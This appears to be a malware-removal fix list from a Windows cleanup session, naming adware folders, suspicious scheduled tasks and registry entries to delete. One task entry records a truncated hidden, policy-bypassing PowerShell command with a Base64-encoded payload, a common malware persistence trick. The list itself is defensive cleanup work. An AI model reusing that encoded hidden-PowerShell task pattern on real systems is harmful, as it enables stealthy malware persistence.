2016-01-24 20:29 - 2016-03-03 07:51 - 00000000 ____D C:\Program Files (x86)\30464E43-1453696161-4B31-385A-C80AA9974D49
2016-01-24 20:29 - 2016-03-03 07:48 - 00000000 ____D C:\Users\Pavilion\AppData\Roaming\NUIns
2016-01-24 20:29 - 2016-01-24 20:29 - 00001888 _____ C:\Users\Pavilion\Desktop\Note-Up.lnk
2016-01-24 20:29 - 2016-01-24 20:29 - 00000000 ____D C:\Users\Pavilion\AppData\Roaming\Note-UP
2016-01-24 20:29 - 2016-01-24 20:29 - 00000000 ____D C:\Program Files (x86)\Note-up
2016-01-24 20:28 - 2016-03-03 07:54 - 00000000 ____D C:\Program Files (x86)\YTDownloader
2016-01-24 20:28 - 2016-03-03 07:49 - 00000000 ____D C:\Program Files\Common Files\ShopperPro3
2016-01-24 20:28 - 2016-01-29 08:18 - 00000000 ____D C:\ProgramData\ShopperPro3
2016-01-24 20:28 - 2016-01-24 20:30 - 00000000 ____D C:\Users\Pavilion\AppData\Local\BrowserHelper
2016-01-24 20:28 - 2016-01-24 20:28 - 00004472 _____ C:\WINDOWS\System32\Tasks\ShopperPro3
2016-01-24 20:28 - 2016-01-24 20:28 - 00004024 _____ C:\WINDOWS\System32\Tasks\YTDownloaderUpd
2016-01-24 20:28 - 2016-01-24 20:28 - 00003696 _____ C:\WINDOWS\System32\Tasks\YTDownloader
2016-01-24 20:28 - 2016-01-24 20:28 - 00002018 _____ C:\Users\Pavilion\Desktop\YTDownloader.lnk
2016-01-24 20:28 - 2016-01-24 20:28 - 00000000 ____D C:\Users\Public\Documents\ShopperPro3
2016-01-24 20:28 - 2016-01-24 20:28 - 00000000 ____D C:\Users\Pavilion\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\YTDownloader
2016-01-24 20:27 - 2016-03-02 22:59 - 00000000 ____D C:\Program Files (x86)\ShopperPro3
2016-01-24 20:00 - 2016-02-18 12:24 - 00000025 _____ C:\WINDOWS\TEMPcoral.vbs
2016-01-24 20:00 - 2016-01-24 20:00 - 00000000 ____D C:\Program Files (x86)\dataup
2016-01-21 21:27 - 2016-01-21 21:34 - 00000000 ____D C:\Users\Pavilion\AppData\Local\Free YouTube Downloader
2016-01-21 21:27 - 2016-01-21 21:27 - 14304128 _____ (HOW Inc. ) C:\Users\Pavilion\Downloads\FYTDSetup.exe
2016-01-21 21:27 - 2016-01-21 21:27 - 00001358 _____ C:\Users\Public\Desktop\Free YouTube Downloader.lnk
2016-01-21 21:27 - 2016-01-21 21:27 - 00000000 ____D C:\Users\Pavilion\AppData\Roaming\How Inc
2016-01-21 21:27 - 2016-01-21 21:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Free YouTube Downloader
2016-01-21 21:27 - 2016-01-21 21:27 - 00000000 ____D C:\Program Files (x86)\Free YouTube Downloader
2015-12-17 16:08 - 2015-12-17 16:08 - 02560512 _____ (winpcoptimizerbetatwo) C:\WINDOWS\Allpcoptimizer.exe
2015-12-17 16:08 - 2015-12-17 16:08 - 00155136 _____ C:\WINDOWS\Allpcoptimizer.pdb
Consumer Input Update Helper (x32 Version: 1.3.25.309 - Compete Inc.) Hidden <==== ATTENTION
Task: {03A725AB-0ECF-466D-8CAE-26C04E4D8105} - System32\Tasks\DriverRestore_DailyScan => C:\Program Files (x86)\DriverRestore\DriverRestore.exe [2015-11-02] ()
Task: {06F04984-0015-4D8E-9367-FF3A492F3E2E} - System32\Tasks\RSPro => C:\Users\Pavilion\AppData\Local\SearchModule\dblaunch.exe <==== ATTENTION
Task: {0C38E4B8-7694-44BD-AFC0-1E9DE8919D2B} - System32\Tasks\Go_Palikan => C:\Users\Pavilion\AppData\Local\{745E4~1\UNINST~1.EXE
Task: {31B6914E-072A-49A8-AFF5-ED3D2A8E593D} - System32\Tasks\PasswordBoss_Desktop => C:\Program Files (x86)\PasswordBoss\PasswordBoss.exe [2016-02-12] ()
Task: {376C0BA5-E15F-4B40-A823-225C3FCABCD0} - System32\Tasks\System HealerPeriod => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
Task: {581639BA-40A3-44E9-BE3C-A203D4EF9822} - \SMW_UpdateTask_Time_333632333935313036312d5a4a6c414a34572a506c415a -> No File <==== ATTENTION
Task: {5BA1A598-F5B4-457B-B4DB-7E473F386859} - \ShopperProJSUpd -> No File <==== ATTENTION
Task: {68E532C5-F968-495A-8162-6190A59DDBC7} - System32\Tasks\One System CarePeriod => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe <==== ATTENTION
Task: {72CC3C55-1058-4579-BA5F-6516C48AF6F8} - System32\Tasks\PBOnce => C:\Program Files (x86)\PasswordBoss\PasswordBoss.exe [2016-02-12] ()
Task: {7D177D35-FE6F-43A7-91C6-CF318ADE203F} - System32\Tasks\UpdateAdmin => C:\Users\Pavilion\AppData\Local\UpdateAdmin\UpdateAdmin.exe <==== ATTENTION
Task: {7EDCE97C-F1C1-4A41-95AC-E6464830CA80} - System32\Tasks\System Healer Task => C:\PROGRA~2\SYSTEM~1\RESCUE~1.EXE
Task: {7F47DD13-F279-45EE-9FD8-5A5567481719} - System32\Tasks\SMWUpd => C:\Program Files\Common Files\Goobzo\GBUpdate\updatehelper.exe <==== ATTENTION
Task: {81721D1D-ABB2-43B4-AC72-4565762C3479} - System32\Tasks\bvxvbxxvaa => C:\Users\Pavilion\AppData\Local\bvxvbxxvaa\bvxvbxxvaa.exe <==== ATTENTION
Task: {8ADB9F75-E245-4DBB-82B5-A8F1E41987A8} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe
Task: {8D275CEB-D1C1-4B0E-9AF8-702B848053D9} - System32\Tasks\GFWRCXRFILHBOWQG => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
Task: {98557964-4BBF-41E8-9595-F8D2A8FBDF7D} - System32\Tasks\YTDownloader => C:\Program Files (x86)\YTDownloader\YTDownloader.exe <==== ATTENTION
Task: {99C02FA6-DBE5-4A50-A65A-A43D748DF35C} - System32\Tasks\{7E0C0947-797E-0F09-0911-780A780E117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9400 more characters).
Task: {9C504D01-71CC-4E96-A021-5D844AF07B34} - System32\Tasks\One System Care Task => C:\PROGRA~2\ONESYS~1\SYSTEM~1.EXE <==== ATTENTION
Task: {A7935D2C-12ED-4545-B7C3-3B78417DA3F8} - System32\Tasks\Hicpadf => C:\Program Files\groover270120160530\Rahmolij.bat [2016-01-26] ()
Task: {A9976B6E-982E-4FE8-9D27-9BEC1EF1208B} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe <==== ATTENTION
Task: {AA589749-7BA5-4EFD-BC80-54BD61B6F4D5} - \SPDriver -> No File <==== ATTENTION
Task: {AADF531D-03A3-4B54-96CE-A8C4E63996AC} - System32\Tasks\Ruoijfij => C:\Program Files\shopperz170220161305\Tutnitah.bat [2016-02-17] () <==== ATTENTION
Task: {B1348402-6939-49E1-BC47-BD109BFAA19F} - System32\Tasks\ProfessionalCleaningSoftware_Popup => C:\Program Files (x86)\Professional Cleaning Software\Splash.exe
Task: {B7863589-5326-4350-98D1-E8385CDF365E} - System32\Tasks\Ioagapi => C:\Program Files\shopperz260120162332\Amoypmai.bat [2016-01-26] () <==== ATTENTION
Task: {B9C9750E-CD41-402A-B195-32C86B6CBAA2} - System32\Tasks\YTDownloaderUpd => C:\Program Files (x86)\YTDownloader\updater.exe <==== ATTENTION
Task: {C92E166A-F6F2-4282-B5F7-60BF2BF6E0EE} - \SPBIW_UpdateTask_Time_333632333935313036312d5a4a6c414a34572a506c415a -> No File <==== ATTENTION
Task: {C9B0ADE5-64FA-45EE-93C4-E36E9724A933} - System32\Tasks\SystemHealer Run Delay => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
Task: {CB72CB9C-27C2-411B-AC33-072F7BEC18B3} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
Task: {CCA6828D-1D7E-4B2C-BA38-E5B9B6F6C898} - System32\Tasks\{78F050FA-630C-8830-4A0C-DB36C4C6C07E} => /s /n /i:"/rt" "C:\PROGRA~3\a4d5839c\ddffd510.dll"
Task: {CE2D8226-EBEF-4733-A8D0-D49096E4873A} - System32\Tasks\OPJRVQSN1 => C:\ProgramData\TomorrowGames\TomorrowGames.exe <==== ATTENTION
Task: {CECE72CC-000D-4EE0-9E55-E2DC813E5058} - System32\Tasks\DNSLAFAYETTE => C:\Program Files (x86)\DNS Unlocker\dnslafayette.exe <==== ATTENTION
Task: {D061F892-44CF-4566-B7C3-DC03AE8EDA12} - System32\Tasks\YPAYFOUHKEKEJOJX => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
Task: {E41E3983-FDFD-409D-B498-A4E5B4613E1A} - System32\Tasks\One System Care Run Delay => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe <==== ATTENTION
Task: {E9ADEB25-056D-4C84-BA2A-0F83C95055A3} - System32\Tasks\PanoramiShoc77 => C:\Users\Pavilion\AppData\Local\ElastiMotio68\Elcycle.exe [2016-02-02] (ArcadeTwist)
Task: {FF3672CD-0761-41C6-BDDF-8B5F39FB7DD9} - System32\Tasks\ShopperPro3 => C:\Program Files (x86)\ShopperPro3\ShopperPro3.exe <==== ATTENTION
Task: {FFF15AF1-43A8-466F-B4A3-0A4DB0ECC63F} - System32\Tasks\JumpstaOf815 => C:\Users\Pavilion\AppData\Local\ElastiMotio68\Elaccumulate.exe [2016-02-02] (ArcadeTwist)
Task: C:\WINDOWS\Tasks\Go_Palikan.job =>
Task: C:\WINDOWS\Tasks\JumpstaOf815.job => C:\Users\Pavilion\AppData\Local\ELASTI~1\Elaccumulate.exe
Task: C:\WINDOWS\Tasks\One System CarePeriod.job => <==== ATTENTION
Task: C:\WINDOWS\Tasks\OPJRVQSN1.job => C:\ProgramData\TomorrowGames\TomorrowGames.exe <==== ATTENTION
C:\ProgramData\TomorrowGames
Task: C:\WINDOWS\Tasks\PanoramiShoc77.job => C:\Users\Pavilion\AppData\Local\ElastiMotio68\Elcycle.exe
Task: C:\WINDOWS\Tasks\System HealerPeriod.job =>
Task: C:\WINDOWS\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
Task: C:\WINDOWS\Tasks\GFWRCXRFILHBOWQG.job => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
C:\ProgramData\Service1291
C:\Users\Pavilion\AppData\Local\JumpstThun357
C:\Program Files\shopperz170220161305
C:\Program Files (x86)\NowUSeeItPlayer
C:\Program Files (x86)\msrtn32
C:\Program Files (x86)\Note-up
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Temp\20160203
C:\Program Files (x86)\dataup
C:\Users\Pavilion\AppData\Local\ElastiMotio68
Task: C:\WINDOWS\Tasks\YPAYFOUHKEKEJOJX.job => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\VOTPrx => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\VOTw8 => ""="Driver"
RemoveProxy:
EmptyTemp: